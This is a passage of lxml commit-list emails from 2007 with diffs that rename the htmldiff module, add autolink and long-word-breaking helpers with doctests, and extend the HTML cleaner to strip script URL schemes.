""" - if not text or not text.strip(): - return [] - words = [w + ' ' for w in text.strip().split()] - if not end_whitespace_re.search(text): - words[-1] = words[-1][:-1] - return words - -start_whitespace_re = re.compile(r'^[ \t\n\r]') - -def start_tag(el): - """ - The text representation of the start tag for a tag. - """ - return '<%s%s>' % ( - el.tag, ''.join(' %s="%s"' % (name, cgi.escape(value, True)) - for name, value in el.attrib.items())) - -def end_tag(el): - """ The text representation of an end tag for a tag. Includes - trailing whitespace when appropriate. """ - if el.tail and start_whitespace_re.search(el.tail): - extra = ' ' - else: - extra = '' - return '</%s>%s' % (el.tag, extra) - -def is_word(tok): - return not tok.startswith('<') - -def is_end_tag(tok): - return tok.startswith('</') - -def is_start_tag(tok): - return tok.startswith('<') and not tok.startswith('</') - -def fixup_ins_del_tags(html): - """ Given an html string, move any <ins> or <del> tags inside of any - block-level elements, e.g. transform <ins><p>word</p></ins> to - <p><ins>word</ins></p> """ - doc = parse_html(html, cleanup=False) - _fixup_ins_del_tags(doc) - html = serialize_html_fragment(doc, drop_outer=True) - return html - -def serialize_html_fragment(el, drop_outer=False): - """ Serialize a single lxml element as HTML. The serialized form - includes the elements tail. 
- - If drop_outer is true, then don't serialize the outermost tag - """ - - html_xsl = """\ -<xsl:transform xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> - <xsl:output method="html" encoding="UTF-8" /> - <xsl:template match="/"> - <xsl:copy-of select="."/> - </xsl:template> -</xsl:transform> -""" - transform = etree.XSLT(etree.XML(html_xsl)) - assert not isinstance(el, basestring), ( - "You should pass in an element, not a string like %r" % el) - html = str(transform(el)) - if drop_outer: - # Get rid of the extra starting tag: - html = html[html.find('>')+1:] - if drop_outer: - # Get rid of the extra end tag: - html = html[:html.rfind('<')] - if drop_outer: - return html.strip() - else: - return html.lstrip() - -def _fixup_ins_del_tags(doc): - """fixup_ins_del_tags that works on an lxml document in-place - """ - for tag in ['ins', 'del']: - for el in doc.xpath('descendant-or-self::%s' % tag): - if not _contains_block_level_tag(el): - continue - _move_el_inside_block(el, tag=tag) - _merge_element_contents(el) - -def _contains_block_level_tag(el): - """True if the element contains any block-level elements, like <p>, <td>, etc. - """ - if el.tag in block_level_tags or el.tag in block_level_container_tags: - return True - for child in el: - if _contains_block_level_tag(child): - return True - return False - -def _move_el_inside_block(el, tag): - """ helper for _fixup_ins_del_tags; actually takes the <ins> etc tags - and moves them inside any block-level tags. 
""" - for child in el: - if _contains_block_level_tag(child): - break - else: - import sys - # No block-level tags in any child - children_tag = etree.Element(tag) - children_tag.text = el.text - el.text = None - children_tag.extend(list(el)) - el[:] = [children_tag] - return - for child in list(el): - if _contains_block_level_tag(child): - _move_el_inside_block(child, tag) - if child.tail: - tail_tag = etree.Element(tag) - tail_tag.text = child.tail - child.tail = None - el.insert(el.index(child)+1, tail_tag) - else: - child_tag = etree.Element(tag) - el.replace(child, child_tag) - child_tag.append(child) - if el.text: - text_tag = etree.Element(tag) - text_tag.text = el.text - el.text = None - el.insert(0, text_tag) - -def _merge_element_contents(el): - """ - Removes an element, but merges its contents into its place, e.g., - given <p>Hi <i>there!</i></p>, if you remove the <i> element you get - <p>Hi there!</p> - """ - parent = el.getparent() - text = el.text or '' - if el.tail: - if not len(el): - text += el.tail - else: - if el[-1].tail: - el[-1].tail += el.tail - else: - el[-1].tail = el.tail - index = parent.index(el) - if text: - if index == 0: - previous = None - else: - previous = parent[index-1] - if previous is None: - if parent.text: - parent.text += text - else: - parent.text = text - else: - if previous.tail: - previous.tail += text - else: - previous.tail = text - parent[index:index+1] = el.getchildren() - -class InsensitiveSequenceMatcher(difflib.SequenceMatcher): - """ - Acts like SequenceMatcher, but tries not to find very small equal - blocks amidst large spans of changes - """ - - threshold = 2 - - def get_matching_blocks(self): - size = min(len(self.b), len(self.b)) - threshold = min(self.threshold, size / 4) - actual = difflib.SequenceMatcher.get_matching_blocks(self) - return [item for item in actual - if item[2] > threshold - or not item[2]] - -# def get_matching_blocks(self): -# size = min(len(self.b), len(self.b)) -# threshold = 
min(self.threshold, size / 4) -# actual = difflib.SequenceMatcher.get_matching_blocks(self) -# last_equal_a = 0 -# eliminate = [] -# for i in xrange(1, len(actual)-1): -# start_diff_length = actual[i][0] - (actual[i-1][0] + actual[i-1][2]) -# end_diff_length = actual[i+1][0] -# for a_pos, b_pos, length in actual: -# if (last_equal_a - a_pos is big -# and length is small -# and next_equal_a is far away): -# continue -# result.append((a_pos, b_pos, length)) -# last_equal_a = a_pos+length -# return result - - -if __name__ == '__main__': - import doctest - doctest.testmod() - Copied: lxml/branch/html/src/lxml/html/tests/test_diff.py (from r43962, lxml/branch/html/src/lxml/html/tests/test_htmldiff.py) ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_htmldiff.py (original) +++ lxml/branch/html/src/lxml/html/tests/test_diff.py Fri Jun 1 20:23:35 2007 @@ -1,12 +1,12 @@ import unittest from lxml.tests.common_imports import doctest -from lxml.html import htmldiff +from lxml.html import diff def test_suite(): suite = unittest.TestSuite() - suite.addTests([doctest.DocFileSuite('test_htmldiff.txt'), - doctest.DocTestSuite(htmldiff)]) + suite.addTests([doctest.DocFileSuite('test_diff.txt'), + doctest.DocTestSuite(diff)]) return suite if __name__ == '__main__': Copied: lxml/branch/html/src/lxml/html/tests/test_diff.txt (from r43962, lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt) ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_diff.txt Fri Jun 1 20:23:35 2007 @@ -1,4 +1,4 @@ -htmldiff does HTML comparisons. These are word-based comparisons. +lxml.html.diff does HTML comparisons. These are word-based comparisons. 
First, a handy function for normalizing whitespace and doing word wrapping:: @@ -12,7 +12,7 @@ Example:: - >>> from lxml.html.htmldiff import htmldiff, split_unbalanced, html_annotate + >>> from lxml.html.diff import htmldiff, html_annotate >>> html1 = '<p>This is some test text with some changes and some same stuff</p>' >>> html2 = '''<p>This is some test textual writing with some changed stuff ... and some same stuff</p>''' @@ -187,36 +187,13 @@ <p><a href="/foo"><span version="0">Hey</span> <span version="1">Guy</span></a></p> +Internals +--------- -Here's a test of a utility function!: +Some utility functions:: - >>> from lxml.html.htmldiff import _merge_element_contents - >>> from lxml import etree - >>> doc = '''<html><body><div> - ... <div id="c1">a b <span id="d1">content</span> c d</div> - ... <div id="c2"><span id="d2">content <b>and more</b> stuff</span> trailing</div> - ... <div id="c3"><b>hi</b><span id="d3"><i>content</i></span></div> - ... <div id="c4"><b>Hi</b> <span id="d4">some stuff<i>more stuff</i></span></div> - ... </div></body></html>''' - >>> doc = etree.HTML(doc) - >>> def show_result(id): - ... el = doc.xpath("//*[@id='d%s']" % id)[0] - ... _merge_element_contents(el) - ... container = doc.xpath("//*[@id='c%s']" % id)[0] - ... print etree.tostring(container).strip() - >>> show_result(1) - <div id="c1">a b content c d</div> - >>> show_result(2) - <div id="c2">content <b>and more</b> stuff trailing</div> - >>> show_result(3) - <div id="c3"><b>hi</b><i>content</i></div> - >>> show_result(4) - <div id="c4"><b>Hi</b> some stuff<i>more stuff</i></div> - -More utility: - - >>> from lxml.html.htmldiff import fixup_ins_del_tags + >>> from lxml.html.diff import fixup_ins_del_tags, split_unbalanced >>> def pfixup(text): ... 
print fixup_ins_del_tags(text).strip() >>> pfixup('<ins><p>some text <b>and more text</b> and more</p></ins>') @@ -233,7 +210,7 @@ </tr></table> -Testing split_unbalanced: +Testing split_unbalanced:: >>> split_unbalanced(['<a href="blah">', 'hey', '</a>']) ([], ['<a href="blah">', 'hey', '</a>'], []) Deleted: /lxml/branch/html/src/lxml/html/tests/test_htmldiff.py ============================================================================== --- /lxml/branch/html/src/lxml/html/tests/test_htmldiff.py Fri Jun 1 20:23:35 2007 +++ (empty file) @@ -1,13 +0,0 @@ -import unittest -from lxml.tests.common_imports import doctest - -from lxml.html import htmldiff - -def test_suite(): - suite = unittest.TestSuite() - suite.addTests([doctest.DocFileSuite('test_htmldiff.txt'), - doctest.DocTestSuite(htmldiff)]) - return suite - -if __name__ == '__main__': - unittest.main() Deleted: /lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt ============================================================================== --- /lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt Fri Jun 1 20:23:35 2007 +++ (empty file) @@ -1,248 +0,0 @@ -htmldiff does HTML comparisons. These are word-based comparisons. - -First, a handy function for normalizing whitespace and doing word wrapping:: - - >>> import re, textwrap - >>> def pwrapped(text): - ... text = re.sub(r'[ \n\t\r]+', ' ', text) - ... text = textwrap.fill(text) - ... print text - >>> def pdiff(text1, text2): - ... pwrapped(htmldiff(text1, text2)) - -Example:: - - >>> from lxml.html.htmldiff import htmldiff, split_unbalanced, html_annotate - >>> html1 = '<p>This is some test text with some changes and some same stuff</p>' - >>> html2 = '''<p>This is some test textual writing with some changed stuff - ... 
and some same stuff</p>''' - >>> pdiff(html1, html2) - <p>This is some test <ins>textual writing with some changed - stuff</ins> <del>text with some changes</del> and some same stuff</p> - -Style tags are largely ignored in terms of differences, though markup is not eliminated:: - - >>> html1 = '<p>Hi <i>you guys</i></p>' - >>> html2 = '<p>Hi <i>you</i> guys</p>' - >>> pdiff(html1, html2) - <p>Hi <i>you</i> guys</p> - >>> pdiff('text', '<p>text</p>') - <p>text</p> - >>> pdiff('<i>Hi guys</i> !!', '<i>Hi guy</i> !!') - <i>Hi <ins>guy</ins> <del>guys</del> </i> !! - >>> pdiff('H<i>i</i>', 'Hi') - <ins>Hi</ins> <del>H<i>i</i></del> - >>> pdiff('<i>A B</i> C', '<i>A</i> C') - <i>A <del>B</del> </i> C - >>> pdiff('<i>A B</i> C', '<i>B</i> C') - <i> <del>A</del> B</i> C - >>> pdiff('<p></p>', '<p></p>') - <p></p> - >>> pdiff('<p>Hi</p>', '<p>Bye</p>') - <p><ins>Bye</ins></p> <p><del>Hi</del></p> - >>> pdiff('<p>Hi Guy</p>', '<p>Bye Guy</p>') - <p> <ins>Bye</ins> <del>Hi</del> Guy</p> - >>> pdiff('<p>Hey there</p>', '') - <ins></ins> <p><del>Hey there</del></p> - -Whitespace is ignored, as it's not meaningful in HTML:: - - >>> pdiff('<div>Hi\n\nguys</div>', '<div>Hi guy</div>') - <div>Hi <ins>guy</ins> <del>guys</del> </div> - -Movement between paragraphs is ignored, as tag-based changes are generally ignored:: - >>> - >>> pdiff('<p>Hello</p><p>World</p>', '<p>Hello World</p>') - <p>Hello World</p> - -As a special case, changing the href of a link is displayed, and -images are treated like words: - - >>> pdiff('<a href="http://yahoo.com">search</a>', '<a href="http://google.com">search</a>') - <a href="http://google.com">search <ins>Link: http://google.com</ins> - <del>Link: http://yahoo.com</del> </a> - >>> pdiff('<p>Print this <img src="print.gif"></p>', '<p>Print this</p>') - <p>Print this <del><img src="print.gif"></del> </p> - >>> pdiff('<a href="http://yahoo.com">search</a>', '<a href="http://yahoo.com">search</a>') - <a href="http://yahoo.com">search</a> - -The 
sixteen combinations:: - -First "insert start" (del start/middle/end/none): - - >>> pdiff('<b>A B C</b>', '<b>D B C</b') - <b> <ins>D</ins> <del>A</del> B C</b> - >>> pdiff('<b>A B C</b>', '<b>D A C</b>') - <b> <ins>D</ins> A <del>B</del> C</b> - >>> pdiff('<b>A B C</b>', '<b>D A B</b>') - <b> <ins>D</ins> A B <del>C</del> </b> - >>> pdiff('<b>A B C</b>', '<b>D A B C</b>') - <b> <ins>D</ins> A B C</b> - -Next, "insert middle" (del start/middle/end/none): - - >>> pdiff('<b>A B C</b>', '<b>D B C</b>') - <b> <ins>D</ins> <del>A</del> B C</b> - >>> pdiff('<b>A B C</b>', '<b>A D C</b>') - <b>A <ins>D</ins> <del>B</del> C</b> - >>> pdiff('<b>A B C</b>', '<b>A D B</b>') - <b>A <ins>D</ins> B <del>C</del> </b> - -This one case hits the threshold of our insensitive matching: - - >>> pdiff('<b>A B C</b>', '<b>A D B C</b>') - <b> <ins>A D</ins> <del>A</del> B C</b> - - -Then "insert end" (del start/middle/end/none): - - >>> pdiff('<b>A B C</b>', '<b>B C D</b>') - <b> <del>A</del> B C <ins>D</ins> </b> - >>> pdiff('<b>A B C</b>', '<b>A C D</b>') - <b>A <del>B</del> C <ins>D</ins> </b> - >>> pdiff('<b>A B C</b>', '<b>A B D</b>') - <b>A B <ins>D</ins> <del>C</del> </b> - >>> pdiff('<b>A B C</b>', '<b>A B C D</b>') - <b>A B C <ins>D</ins> </b> - -Then no insert (del start/middle/end): - - >>> pdiff('<b>A B C</b>', '<b>B C</b>') - <b> <del>A</del> B C</b> - >>> pdiff('<b>A B C</b>', '<b>A C</b>') - <b>A <del>B</del> C</b> - >>> pdiff('<b>A B C</b>', '<b>A B</b>') - <b>A B <del>C</del> </b> - - >>> pdiff('<b>A B</b> C', '<b>A B</b>') - <b>A B</b> <del>C</del> - >>> pdiff('<b>A B</b> <b>C</b>', '<b>A B</b>') - <b>A B</b> <del><b>C</b></del> - >>> pdiff('A <p><b>hey there</b> <i>how are you?</i></p>', 'A') - A <p><del><b>hey there</b> <i>how are you?</i></del></p> - -Testing a larger document, to make sure there are not weird -unnecessary parallels found: - - >>> pdiff(''' - ... <p>This is a test document with many words in it that goes on - ... 
for a while and doesn't have anything do to with the next - ... document that we match this against</p>''', ''' - ... <p>This is another document with few similarities to the preceding - ... one, but enough that it may have overlap that could turn into - ... a confusing series of deletes and inserts. - ... </p>''') - <p><ins>This is another document with few similarities to the - preceding one, but enough that it may have overlap that could turn - into a confusing series of deletes and inserts. </ins></p> - <p><del>This is a test document with many words in it that goes on for - a while and doesn't have anything do to with the next document that we - match this against</del></p> - - - -Annotation of content can also be done, where every bit of content is -marked up with information about where it came from. - -First, some setup; note that html_annotate is called with a sequence -of documents and the annotation associated with that document. We'll -just use indexes, but you could use author or timestamp information. - - >>> def markup(text, annotation): - ... return '<span version="%s">%s</span>' % (annotation, text) - >>> def panno(*docs): - ... pwrapped(html_annotate([(doc, index) for index, doc in enumerate(docs)], - ... markup=markup)) - -Now, a sequence of documents: - - >>> panno('Hello cruel world', 'Hi cruel world', 'Hi world') - <span version="1">Hi</span> <span version="0">world</span> - >>> panno('A similar document', 'A similar document', - ... 
'A similar document here') - <span version="0">A similar document</span> <span - version="2">here</span> - >>> panno('<p>P1 para</p><p>P2 para</p>', '<p>P1 para</p><p>P3 foo</p>') - <p><span version="0">P1 para</span></p><p><span version="1">P3 - foo</span></p> - >>> panno('Hello<p>There World</p>','Hello<p>There Town</p>') - <span version="0">Hello</span><p><span version="0">There</span> <span - version="1">Town</span></p> - >>> panno('<p>Hello</p>There World','<p>Hello</p>There Town') - <p><span version="0">Hello</span></p><span version="0">There</span> - <span version="1">Town</span> - >>> panno('<p>Hello</p><p>There World</p>','<p>Hello</p><p>There Town</p>') - <p><span version="0">Hello</span></p><p><span version="0">There</span> - <span version="1">Town</span></p> - >>> panno('<p>Hi <img src="/foo"> You</p>', - ... '<p>Hi You</p>', - ... '<p>Hi You <img src="/bar"></p>') - <p><span version="0">Hi</span> <span version="1">You</span> <span - version="2"><img src="/bar"></span></p> - >>> panno('<p><a href="/foo">Hey</a></p>', - ... '<p><a href="/bar">Hey</a></p>') - <p><a href="/bar"><span version="0">Hey</span></a></p> - >>> panno('<p><a href="/foo">Hey You</a></p>', - ... '<p><a href="/foo">Hey Guy</a></p>') - <p><a href="/foo"><span version="0">Hey</span> <span - version="1">Guy</span></a></p> - - - -Here's a test of a utility function!: - - >>> from lxml.html.htmldiff import _merge_element_contents - >>> from lxml import etree - >>> doc = '''<html><body><div> - ... <div id="c1">a b <span id="d1">content</span> c d</div> - ... <div id="c2"><span id="d2">content <b>and more</b> stuff</span> trailing</div> - ... <div id="c3"><b>hi</b><span id="d3"><i>content</i></span></div> - ... <div id="c4"><b>Hi</b> <span id="d4">some stuff<i>more stuff</i></span></div> - ... </div></body></html>''' - >>> doc = etree.HTML(doc) - >>> def show_result(id): - ... el = doc.xpath("//*[@id='d%s']" % id)[0] - ... _merge_element_contents(el) - ... 
container = doc.xpath("//*[@id='c%s']" % id)[0] - ... print etree.tostring(container).strip() - >>> show_result(1) - <div id="c1">a b content c d</div> - >>> show_result(2) - <div id="c2">content <b>and more</b> stuff trailing</div> - >>> show_result(3) - <div id="c3"><b>hi</b><i>content</i></div> - >>> show_result(4) - <div id="c4"><b>Hi</b> some stuff<i>more stuff</i></div> - -More utility: - - >>> from lxml.html.htmldiff import fixup_ins_del_tags - >>> def pfixup(text): - ... print fixup_ins_del_tags(text).strip() - >>> pfixup('<ins><p>some text <b>and more text</b> and more</p></ins>') - <p><ins>some text <b>and more text</b> and more</ins></p> - >>> pfixup('<p><ins>Hi!</ins> you</p>') - <p><ins>Hi!</ins> you</p> - >>> pfixup('<div>Some text <ins>and <p>more text</p></ins> </div>') - <div>Some text <ins>and </ins><p><ins>more text</ins></p> </div> - >>> pfixup(''' - ... <ins><table><tr><td>One table</td><td>More stuff</td></tr></table></ins>''') - <table><tr> - <td><ins>One table</ins></td> - <td><ins>More stuff</ins></td> - </tr></table> - - -Testing split_unbalanced: - - >>> split_unbalanced(['<a href="blah">', 'hey', '</a>']) - ([], ['<a href="blah">', 'hey', '</a>'], []) - >>> split_unbalanced(['<a href="blah">', 'hey']) - (['<a href="blah">'], ['hey'], []) - >>> split_unbalanced(['Hey', '</i>', 'You', '</b>']) - ([], ['Hey', 'You'], ['</i>', '</b>']) - >>> split_unbalanced(['So', '</i>', 'Hi', '<b>', 'There', '</b>']) - ([], ['So', 'Hi', '<b>', 'There', '</b>'], ['</i>']) - >>> split_unbalanced(['So', '</i>', 'Hi', '<b>', 'There']) - (['<b>'], ['So', 'Hi', 'There'], ['</i>']) - From ianb at codespeak.net Fri Jun 1 21:43:00 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 21:43:00 +0200 (CEST) Subject: [Lxml-checkins] r43979 - in lxml/branch/html/src/lxml/html: . 
tests Message-ID: <20070601194300.9C17E80AE@code0.codespeak.net> Author: ianb Date: Fri Jun 1 21:42:58 2007 New Revision: 43979 Added: lxml/branch/html/src/lxml/html/tests/test_autolink.py (contents, props changed) lxml/branch/html/src/lxml/html/tests/test_autolink.txt (contents, props changed) Modified: lxml/branch/html/src/lxml/html/clean.py Log: Added an autolinking function Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 21:42:58 2007 @@ -3,23 +3,30 @@ from lxml.html import defs from lxml.html import parse, tostring -__all__ = ['clean_html', 'clean'] +__all__ = ['clean_html', 'clean', 'autolink', 'autolink_html'] -# FIXME: I should study this for more ideas: http://feedparser.org/docs/html-sanitization.html -# Other on* attributes that aren't standard? -# Try these tests: http://feedparser.org/tests/wellformed/sanitize/ -# Also http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl -# max width for words +# Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl +# I have multiple kinds of schemes searched; but should schemes be +# whitelisted instead? +# max width for words (but not in pre or textarea) # max height? -# autolink? -# CSS stuff? -# remove images? +# autolink? (don't autolink in textarea, pre, code) +# remove images? Also in CSS? background attribute? +# Some way to whitelist object, iframe, etc (e.g., if you want to +# allow *just* embedded YouTube movies) +# Log what was deleted and why? 
# This is an IE-specific construct you can have in a stylesheet to # run some Javascript: _css_javascript_re = re.compile( r'expression\(.*?\)', re.S|re.I) +# All kinds of schemes besides just javascript: that can cause +# execution: +_javascript_scheme_re = re.compile( + r'\s*(?:javascript|jscript|livescript|vbscript|about):', re.I) +_whitespace_re = re.compile(r'\s+') + def clean_html(html, **kw): """ Like clean(), but takes a text input document, and returns a text @@ -93,7 +100,7 @@ Remove any form tags ``annoying_tags``: - Tags that aren't *wrong*, but are annoying. ``<blink>`` (FIXME: marquee?) + Tags that aren't *wrong*, but are annoying. ``<blink>`` and ``<marque>`` ``remove_tags``: A list of tags to remove. @@ -190,7 +197,7 @@ remove_tags.extend(['form']) kill_tags.extend(['button', 'input', 'select', 'textarea']) if annoying_tags: - remove_tags.extend(['blink']) + remove_tags.extend(['blink', 'marque']) bad = [] for el in _itertree(doc): if el.tag in kill_tags: @@ -238,8 +245,136 @@ el.attrib['rel'] = 'nofollow' def _remove_javascript(link): - if link.strip().startswith('javascript:'): + # links like "j a v a s c r i p t:" might be interpreted in IE + new = _whitespace_re.sub('', link) + if _javascript_scheme_re.search(new): # FIXME: should this be None to delete? 
return '' return link +_link_regexes = [ + re.compile(r'(?P<body>https?://(?P<host>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?)', re.I), + # This is conservative, but autolinking can be a bit conservative: + re.compile(r'mailto:(?P<body>[a-z0-9._-]+@(?P<host>[a-z0-9_._]+[a-z]))', re.I), + ] + +_avoid_elements = ['textarea', 'pre', 'code', 'head', 'select', 'a'] + +_avoid_hosts = [ + re.compile(r'^localhost', re.I), + re.compile(r'\bexample\.(?:com|org|net)$', re.I), + re.compile(r'^127\.0\.0\.1$'), + ] + +_avoid_classes = ['nolink'] + +def autolink(el, link_regexes=_link_regexes, + avoid_elements=_avoid_elements, + avoid_hosts=_avoid_hosts, + avoid_classes=_avoid_classes): + """ + Turn any URLs into links. + + It will search for links identified by the given regular + expressions (by default mailto and http(s) links). + + It won't link text in an element in avoid_elements, or an element + with a class in avoid_classes. It won't link to anything with a + host that matches one of the regular expressions in avoid_hosts + (default localhost and 127.0.0.1). + + If you pass in an element, the elements tail will not be + substituted, only the contents of the element. 
+ """ + if el.tag in avoid_elements: + return + class_name = el.attrib.get('class') + if class_name: + class_name = class_name.split() + for match_class in avoid_classes: + if match_class in class_name: + return + for child in list(el): + autolink(child, link_regexes=link_regexes, + avoid_elements=avoid_elements, + avoid_hosts=avoid_hosts, + avoid_classes=avoid_classes) + if child.tail: + text, tail_children = _link_text( + child.tail, link_regexes, avoid_hosts, factory=el.makeelement) + if tail_children: + child.tail = text + index = el.index(child) + el[index+1:index+1] = tail_children + if el.text: + text, pre_children = _link_text( + el.text, link_regexes, avoid_hosts, factory=el.makeelement) + if pre_children: + el.text = text + el[:0] = pre_children + +def _link_text(text, link_regexes, avoid_hosts, factory): + leading_text = '' + links = [] + last_pos = 0 + while 1: + best_match, best_pos = None, None + for regex in link_regexes: + regex_pos = last_pos + while 1: + match = regex.search(text, pos=regex_pos) + if match is None: + break + host = match.group('host') + for host_regex in avoid_hosts: + if host_regex.search(host): + regex_pos = match.end() + break + else: + break + if match is None: + continue + if best_pos is None or match.start() < best_pos: + best_match = match + best_pos = match.start() + if best_match is None: + # No more matches + if links: + assert not links[-1].tail + links[-1].tail = text + else: + assert not leading_text + leading_text = text + break + link = best_match.group(0) + end = best_match.end() + if link.endswith('.') or link.endswith(','): + # These punctuation marks shouldn't end a link + end -= 1 + link = link[:-1] + prev_text = text[:best_match.start()] + if links: + assert not links[-1].tail + links[-1].tail = prev_text + else: + assert not leading_text + leading_text = prev_text + anchor = factory('a') + anchor.attrib['href'] = link + body = best_match.group('body') + if not body: + body = link + if body.endswith('.') or 
body.endswith(','): + body = body[:-1] + anchor.text = body + links.append(anchor) + text = text[end:] + return leading_text, links + +def autolink_html(html, *args, **kw): + doc = parse(html) + autolink(doc, *args, **kw) + return tostring(doc) + + + Added: lxml/branch/html/src/lxml/html/tests/test_autolink.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_autolink.py Fri Jun 1 21:42:58 2007 @@ -0,0 +1,10 @@ +import unittest +from lxml.tests.common_imports import doctest + +def test_suite(): + suite = unittest.TestSuite() + suite.addTests([doctest.DocFileSuite('test_autolink.txt')]) + return suite + +if __name__ == '__main__': + unittest.main() Added: lxml/branch/html/src/lxml/html/tests/test_autolink.txt ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_autolink.txt Fri Jun 1 21:42:58 2007 @@ -0,0 +1,37 @@ +This tests autolink:: + + >>> from lxml.html import usedoctest + >>> from lxml.html.clean import autolink_html + >>> print autolink_html(''' + ... <div>Link here: http://test.com/foo.html.</div> + ... ''') + <div>Link here: <a href="http://test.com/foo.html">http://test.com/foo.html</a>.</div> + >>> print autolink_html(''' + ... <div>Mail me at mailto:ianb@test.com or http://myhome.com</div> + ... ''') + <div>Mail me at <a href="mailto:ianb@test.com">ianb@test.com</a> + or <a href="http://myhome.com">http://myhome.com</a></div> + >>> print autolink_html(''' + ... <div>The <b>great</b> thing is the http://link.com links <i>and</i> + ... the http://foobar.com links.</div>''') + <div>The <b>great</b> thing is the <a href="http://link.com">http://link.com</a> links <i>and</i> + the <a href="http://foobar.com">http://foobar.com</a> links.</div> + +Some cases that won't be caught (on purpose):: + + >>> print autolink_html(''' + ...
<div>A link to http://localhost/foo/bar won't, but a link to + ... http://test.com will</div>''') + <div>A link to http://localhost/foo/bar won't, but a link to + <a href="http://test.com">http://test.com</a> will</div> + >>> print autolink_html(''' + ... <div>A link in <textarea>http://test.com</textarea></div>''') + <div>A link in <textarea>http://test.com</textarea></div> + >>> print autolink_html(''' + ... <div>A link in <a href="http://foo.com">http://bar.com</a></div>''') + <div>A link in <a href="http://foo.com">http://bar.com</a></div> + >>> print autolink_html(''' + ... <div>A link in <code>http://foo.com</code> or + ... <span class="nolink">http://bar.com</span></div>''') + <div>A link in <code>http://foo.com</code> or + <span class="nolink">http://bar.com</span></div> From ianb at codespeak.net Fri Jun 1 22:40:07 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 22:40:07 +0200 (CEST) Subject: [Lxml-checkins] r43982 - in lxml/branch/html/src/lxml/html: . 
tests Message-ID: <20070601204007.30FE5807C@code0.codespeak.net> Author: ianb Date: Fri Jun 1 22:40:06 2007 New Revision: 43982 Modified: lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/tests/test_autolink.txt Log: Added long word breaking Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 22:40:06 2007 @@ -3,14 +3,14 @@ from lxml.html import defs from lxml.html import parse, tostring -__all__ = ['clean_html', 'clean', 'autolink', 'autolink_html'] +__all__ = ['clean_html', 'clean', 'autolink', 'autolink_html', + 'word_break', 'word_break_html'] # Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl +# Particularly the CSS cleaning; most of the tag cleaning is integrated now # I have multiple kinds of schemes searched; but should schemes be # whitelisted instead? -# max width for words (but not in pre or textarea) # max height? -# autolink? (don't autolink in textarea, pre, code) # remove images? Also in CSS? background attribute? # Some way to whitelist object, iframe, etc (e.g., if you want to # allow *just* embedded YouTube movies) @@ -376,5 +376,82 @@ autolink(doc, *args, **kw) return tostring(doc) - - +_avoid_word_break_elements = ['pre', 'textarea', 'code'] +_avoid_word_break_classes = ['nobreak'] + +def word_break(el, max_width=40, + avoid_elements=_avoid_word_break_elements, + avoid_classes=_avoid_word_break_classes, + break_character=u'\u200b'): + """ + Breaks any long words found in the body of the text (not attributes). + + Doesn't effect any of the tags in avoid_elements, by default + textarea and pre + + Breaks words by inserting &#8203;, which is a unicode character + for Zero Width Space character.
This generally takes up no space + in rendering, but does copy as a space, and in monospace contexts + usually takes up space. + + See http://www.cs.tut.fi/~jkorpela/html/nobr.html for a discussion + """ + # Character suggestion of ​ comes from: + # http://www.cs.tut.fi/~jkorpela/html/nobr.html + if el.tag in _avoid_word_break_elements: + return + class_name = el.attrib.get('class') + if class_name: + dont_break = False + class_name = class_name.split() + for avoid in avoid_classes: + if avoid in class_name: + dont_break = True + break + if dont_break: + return + if el.text: + el.text = _break_text(el.text, max_width, break_character) + for child in el: + word_break(child, max_width=max_width, + avoid_elements=avoid_elements, + avoid_classes=avoid_classes, + break_character=break_character) + if child.tail: + child.tail = _break_text(child.tail, max_width, break_character) + +def word_break_html(html, *args, **kw): + doc = parse(html) + word_break(doc, *args, **kw) + return tostring(doc) + +def _break_text(text, max_width, break_character): + words = text.split() + for word in words: + if len(word) > max_width: + replacement = _insert_break(word, max_width, break_character) + text = text.replace(word, replacement) + return text + +_break_prefer_re = re.compile(r'[^a-z]', re.I) + +def _insert_break(word, width, break_character): + orig_word = word + result = '' + while len(word) > width: + start = word[:width] + breaks = list(_break_prefer_re.finditer(start)) + if breaks: + last_break = breaks[-1] + # Only walk back up to 10 characters to find a nice break: + if last_break.end() > width-10: + # FIXME: should the break character be at the end of the + # chunk, or the beginning of the next chunk? 
+ start = word[:last_break.end()] + result += start + break_character + word = word[len(start):] + result += word + return result + + + Modified: lxml/branch/html/src/lxml/html/tests/test_autolink.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_autolink.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_autolink.txt Fri Jun 1 22:40:06 2007 @@ -35,3 +35,28 @@ ... <span class="nolink">http://bar.com</span></div>''') <div>A link in <code>http://foo.com</code> or <span class="nolink">http://bar.com</span></div> + +There's also a word wrapping function, that should probably be run +after autolink:: + + >>> from lxml.html.clean import word_break_html + >>> def pascii(s): + ... print s.decode('utf8').encode('ascii', 'xmlcharrefreplace') + >>> pascii(word_break_html(''' + ... <div>Hey you + ... 12345678901234567890123456789012345678901234567890</div>''')) + <div>Hey you + 1234567890123456789012345678901234567890​1234567890</div> + +Not everything is broken: + + >>> pascii(word_break_html(''' + ... <div>Hey you + ... <code>12345678901234567890123456789012345678901234567890</code></div>''')) + <div>Hey you + <code>12345678901234567890123456789012345678901234567890</code></div> + >>> pascii(word_break_html(''' + ... 
